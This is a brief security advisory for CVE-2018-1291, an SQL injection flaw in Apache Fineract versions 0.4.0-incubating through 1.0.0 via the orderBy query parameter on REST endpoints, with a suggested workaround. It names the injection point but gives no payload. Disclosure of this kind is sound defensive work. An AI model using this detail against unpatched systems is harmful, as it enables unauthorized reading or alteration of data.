CVE-2018-1291

Name of the Vulnerable Software and Affected Versions Apache Fineract versions 0.4.0-incubating through 1.0.0

Description The issue allows a hacker to inject SQL statements through the orderBy query parameter, which is appended directly to SQL statements. This can enable unauthorized access to read or update data. The orderBy parameter is exposed through various REST endpoints used to query domain-specific entities.

Recommendations For Apache Fineract versions 0.4.0-incubating through 1.0.0, as a temporary workaround, consider restricting access to the orderBy query parameter in the affected REST endpoints until a patch is available. Additionally, restrict the use of the order parameter to prevent SQL injection.